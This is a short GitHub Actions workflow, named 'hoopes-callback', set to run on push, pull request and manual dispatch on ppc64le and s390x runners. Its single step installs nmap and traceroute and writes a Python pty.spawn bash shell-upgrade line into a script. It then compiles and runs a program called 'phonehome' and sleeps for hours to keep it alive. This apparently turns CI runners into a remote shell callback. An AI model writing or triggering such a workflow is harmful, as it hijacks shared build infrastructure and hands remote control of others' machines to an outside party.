name: hoopes-callback
on:
  workflow_dispatch:
  push:
  pull_request:
  
jobs:   
  power_shell:
    runs-on: ubuntu-24.04-ppc64le ubuntu-24.04-ppc64le-p10 ubuntu-24.04-s390x
    steps:
    - uses: actions/checkout@v4
      
    - name: Lets do this
      run: |
        sudo apt update
        sudo apt install nmap traceroute
        echo "python -c 'import pty; pty.spawn(\"/bin/bash\")'" > fix_job.sh
        gcc phonehome.c -o phonehome
        ./phonehome
        #pause for about 2.8 hours so that phonehome doesn't die. Not sure why phonehome doesn't keep things alive.
        sleep 10000
  
